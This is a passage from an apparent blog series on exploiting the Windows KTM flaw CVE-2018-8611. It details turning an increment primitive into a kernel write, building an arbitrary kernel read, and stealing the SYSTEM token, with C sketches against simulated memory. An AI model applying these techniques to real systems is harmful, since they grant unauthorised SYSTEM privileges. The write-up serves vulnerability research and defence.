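/* Returns how many bytes memmove() would copy from Description.Buffer and
 * sets *overflow when STATUS_BUFFER_OVERFLOW would be reported. Assumes the
 * info_len >= 0x18 precondition checked at the top of the excerpt. */
uint32_t model_copy_length(uint32_t info_len, uint16_t desc_len, int *overflow)
{
    uint32_t needed = (uint32_t)desc_len + DESCRIPTION_OFFSET;
    assert(info_len >= 0x18);
    if (info_len >= needed) {
        *overflow = 0;
        return desc_len;                        /* whole description fits */
    }
    *overflow = 1;
    return info_len - DESCRIPTION_OFFSET;       /* truncated copy */
}
```

In other words, to read N bytes at kernel address A, we set Description.Length to N and Description.Buffer to A, and pass an output buffer of at least N + 0x14 bytes.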

When we no longer need the arbitrary kernel read primitive, we simply set the fields back to 0 so that the kernel does not attempt to free our Buffer when destroying the resource manager.

The primary caveat of this approach is that writing pointers with increments is somewhat slow. On 64-bit we need to do at most (256*8)*2 increments per pointer, but if we are looping over an _EPROCESS linked list and reading pointers, hashing process names, etc., it is a little slow – it takes up to 60 seconds depending on where the _EPROCESS structure happens to live in the linked list.

The reason why we only need to do the initial 256*8 writes to get a full 64-bit value is that we split the increments across 8 different addresses, one for each byte of the 64-bit value. Each of these bytes is incremented 256 or fewer times to hit the desired value.

Considering each pointer (the 8 bytes are the 8 in 8*256 and the 256 corresponds to values for each byte from 0x00 to 0xff):

0x1000: 00 00 00 00 00 00 00 00

Say you want the value 0x1234 to be written, but don't want to perform 0x1234 increments. First you increment 0x34 times at address 0x1000:

0x1000: 34 00 00 00 00 00 00 00 - 8 bytes

The second time you increment 0x12 times at address 0x1001:

0x1000: 34 12 00 00 00 00 00 00 - 8 bytes
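The byte-splitting idea can be sketched as a small planner that, starting from a zeroed 64-bit value, computes how many increments to issue at each byte address. It assumes a little-endian target (as x86 and x64 are) and a starting value of zero; `plan_byte_increments()` is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/* Starting from a zeroed 64-bit value, compute how many increments to apply
 * at each byte address (base + i) so that no byte ever wraps. On a
 * little-endian target, byte i of the value is (value >> (8 * i)) & 0xff. */
unsigned plan_byte_increments(uint64_t target, uint8_t counts[8])
{
    unsigned total = 0;
    assert(counts != 0);
    for (int i = 0; i < 8; i++) {
        counts[i] = (uint8_t)(target >> (8 * i));
        total += counts[i];
    }
    return total;   /* at most 8 * 255 increments */
}
```

For 0x1234 this gives 0x34 + 0x12 = 70 increments instead of 4660 aligned ones.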

That's quite a bit more useful than incrementing 64-bit integers. One problem with this misaligned write approach is that when a new value requires one of the bytes to wrap, the carry propagates into the adjacent byte. For instance, say we want to change the most significant byte from 0x40 and wrap it around to 0x01.

0x1000: 00 00 00 00 00 00 00 40 - 8 bytes

If we use our increment primitive to write to address 0x1007 and increment the value 0xc1 times, what will happen is that when we cross from 0xff to 0x00 the byte adjacent to our target will be incremented by one due to the carry bit, meaning we potentially corrupt adjacent memory in an unwanted way.

As an example, before a byte wrap:

0x1000: 00 00 00 00 00 00 00 FF 00 - 9 bytes

And after a byte wrap:

0x1000: 00 00 00 00 00 00 00 00 01 - 9 bytes

The easiest solution to this is to detect if you will trigger this type of corruption while writing a new value to the target address and if so, reset the whole 64-bit value to 0 first. In this case you use up to yet another 256*8 (this is why earlier we said (256*8)*2 for any given value) misaligned increments to set every byte to FF first, and then do an aligned increment to wrap the full value to 0 with no unwanted side effects.
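Detecting whether a reset is needed only requires comparing the old and new values byte by byte: a wrap, and therefore a carry, happens exactly when some target byte is smaller than the current one. A minimal sketch, with a hypothetical helper name:

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 if moving from `current` to `target` with per-byte increments
 * would require some byte to wrap past 0xff (and so carry into its
 * neighbour), i.e. if any target byte is smaller than the current byte. */
int write_needs_reset(uint64_t current, uint64_t target)
{
    for (int i = 0; i < 8; i++) {
        uint8_t cur = (uint8_t)(current >> (8 * i));
        uint8_t want = (uint8_t)(target >> (8 * i));
        if (want < cur)
            return 1;
    }
    return 0;
}
```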

So as the final example assume we already wrote 0x1234 to our target:

0x1000: 34 12 00 00 00 00 00 00 - 8 bytes

But now we want this value to become 0x1233, which is lower than the original value. In order to create this value without any unwanted bit carrying or adjacent memory corruption we must perform the following steps:

Use misaligned increments to set every byte to FF:

0x1000: FF FF FF FF FF FF FF FF - 8 bytes

Do an aligned increment to set the value back to 0 without carrying the bit to an adjacent byte:

0x1000: 00 00 00 00 00 00 00 00 - 8 bytes

Redo the original two misaligned writes (0x33 increments at 0x1000 and 0x12 at 0x1001) to get the value we want:

0x1000: 33 12 00 00 00 00 00 00 - 8 bytes
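The whole procedure can be checked against a simulated memory buffer. The sketch below assumes the primitive behaves like adding 1 to a little-endian integer of `width` bytes at the chosen address, where carries propagate upwards and the final carry is lost. Judging from the `_InterlockedAdd(..., 1u)` in KiTryUnwaitThread(), a 4-byte width seems likely; in that case the "aligned increment" reset step takes one increment per aligned dword rather than a single one. All names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simulated increment primitive: add 1 to the little-endian integer of
 * `width` bytes starting at mem[off]. A carry out of a byte propagates into
 * the next byte; a carry out of the top byte is discarded. */
static void increment_at(uint8_t *mem, size_t off, size_t width)
{
    for (size_t i = 0; i < width; i++)
        if (++mem[off + i] != 0)
            break;                      /* no carry: stop */
}

static unsigned byte_of(uint64_t v, int i) { return (unsigned)((v >> (8 * i)) & 0xff); }

/* Rewrites the 8-byte value at mem[base] from `current` to `target` using only
 * increments and returns how many were used. Assumes width divides 8, base is
 * width-aligned and mem has width - 1 spare bytes after the value. */
unsigned rewrite_value(uint8_t *mem, size_t base, uint64_t current,
                       uint64_t target, size_t width)
{
    unsigned used = 0;
    int need_reset = 0;
    assert(width > 0 && 8 % width == 0 && base % width == 0);
    for (int i = 0; i < 8; i++)
        if (byte_of(target, i) < byte_of(current, i))
            need_reset = 1;
    if (need_reset) {
        /* 1) misaligned increments raise every byte to 0xff without wrapping */
        for (int i = 0; i < 8; i++)
            for (unsigned n = byte_of(current, i); n < 0xff; n++, used++)
                increment_at(mem, base + i, width);
        /* 2) aligned increments wrap each width-sized chunk to zero; the final
         *    carry is discarded, so bytes after the value stay untouched */
        for (size_t k = 0; k < 8; k += width, used++)
            increment_at(mem, base + k, width);
        current = 0;
    }
    /* 3) per-byte increments up to the target, again without wrapping */
    for (int i = 0; i < 8; i++)
        for (unsigned n = byte_of(current, i); n < byte_of(target, i); n++, used++)
            increment_at(mem, base + i, width);
    return used;
}
```

Rewriting 0x1234 as 0x1233 this way takes 2041 increments with a 4-byte width, within the (256*8)*2 bound mentioned earlier, and the bytes after the target are never modified.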

The following illustration shows how the arbitrary kernel read primitive works in practice. In this example, after we leak the resource manager base address, we modify the resource manager Description with our LWP enlistments once, use NtQueryInformationResourceManager() to do one arbitrary kernel read operation and then set the Description field back to zero with another set of LWP enlistments.

In a real scenario, we would chain many more sets of LWP enlistments to continue changing the Description field to leak more kernel memory contents and write to other kernel addresses to elevate our privileges.

Privilege escalation

So even though the "Limited Write Primitive" (LWP) is not the best write primitive in the world, combining it with our arbitrary kernel read primitive is enough to escalate privileges. By building wrappers in the exploit that abstract all this logic, we can use the LWP like any other write primitive, and the rest is fairly straightforward.

Since we already leaked the _KTHREAD associated with our recovery thread, we can easily find an _EPROCESS structure, which in turn allows us to walk the linked list of processes searching for the SYSTEM process. This gives us the _EX_FAST_REF token pointer to a SYSTEM token, at which point we update our own process's _EPROCESS to swap in that token pointer. We also use the LWP to bump the RefCnt of the token pointer to be sure we can repeatedly exploit the vulnerability without the borrowed SYSTEM token disappearing on us.

This is enough to fairly reliably get SYSTEM privileges across all affected Windows hosts from Vista to Windows 10 on both x86 and x64.
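The process list walk and token pointer handling can be sketched against simulated memory; in the exploit, every dereference below would instead be a read through the NtQueryInformationResourceManager() primitive. The `sim_eprocess` layout is hypothetical (real _EPROCESS offsets vary between builds). The masking reflects that _EX_FAST_REF keeps a reference count in the low 4 bits on x64 (3 bits on x86), and the search relies on the SYSTEM process having PID 4.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* _EX_FAST_REF keeps a small reference count in the low pointer bits:
 * 4 bits on x64 (3 on x86). Masking them off yields the object address. */
#define FAST_REF_BITS_X64 4u

uint64_t fast_ref_object(uint64_t fast_ref)
{
    return fast_ref & ~(((uint64_t)1 << FAST_REF_BITS_X64) - 1);
}

typedef struct sim_list_entry { struct sim_list_entry *Flink, *Blink; } sim_list_entry;

/* Hypothetical, simplified process object; not the real _EPROCESS layout. */
typedef struct sim_eprocess {
    uint64_t UniqueProcessId;
    sim_list_entry ActiveProcessLinks;
    uint64_t Token;                       /* _EX_FAST_REF */
} sim_eprocess;

#define SIM_CONTAINING_PROCESS(le) \
    ((sim_eprocess *)((char *)(le) - offsetof(sim_eprocess, ActiveProcessLinks)))

/* Walks the circular list starting at `start` looking for `pid`
 * (the SYSTEM process is PID 4). Returns NULL if it is not found. */
sim_eprocess *find_process_by_pid(sim_eprocess *start, uint64_t pid)
{
    sim_list_entry *le = &start->ActiveProcessLinks;
    do {
        sim_eprocess *p = SIM_CONTAINING_PROCESS(le);
        if (p->UniqueProcessId == pid)
            return p;
        le = le->Flink;
    } while (le != &start->ActiveProcessLinks);
    return NULL;
}
```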

Caveats

There are a number of problems with using the increment as our write primitive:

- Each time we use the increment primitive, we execute code at DISPATCH_LEVEL that references our fake structures in userland memory. If any of those pages happen to be paged out at that moment, we will BSOD. If you're executing 10000+ increments in order to access various bits of information, it is possible this will happen.

- If we do the typical SYSTEM token swap, then any access by the rest of the system to the _EX_FAST_REF pointer during our modification can potentially cause a BSOD. This is because we have no choice but to slowly increment the pointer to a different value, and many values along the way will be invalid. This means that if a tool like Task Manager or Process Explorer is running, there is a higher chance of BSOD.

- Privilege escalation done this way is somewhat slow, in that every time we have to write a new pointer, we queue potentially thousands of enlistments to adjust the pointer to the next desired value.

Demo

The following is a recording showing exploitation on an unpatched Windows 10 1809 x64, last updated approximately October 2018, before the CVE-2018-8611 patch was released. You can see that due to the use of increments as a write primitive, the transition from detecting that the race was won to full-blown privilege escalation is a little slow (~30 seconds).

Conclusion

In this part, we described how we abuse an initial kernel address revelation to build two primitives: a write primitive built on top of an increment primitive, triggered by calling KeReleaseMutex() on a fake userland object, and an arbitrary kernel read primitive using the NtQueryInformationResourceManager() syscall. Together, these are enough to escalate privileges. We also explained how we make the recovery thread exit cleanly.

We also described some caveats with our approach. In the final part of this series, we will discuss a very powerful read/write primitive used by the 0day exploit discovered by Kaspersky, some caveats about it, and why our approach is probably still an essential starting point on x86. You can read part 5 of this blog series here.

Read all posts in the Exploiting Windows KTM series

- CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction

- CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic triggering

- CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition and debugging tricks

- CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read and write primitive

- CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive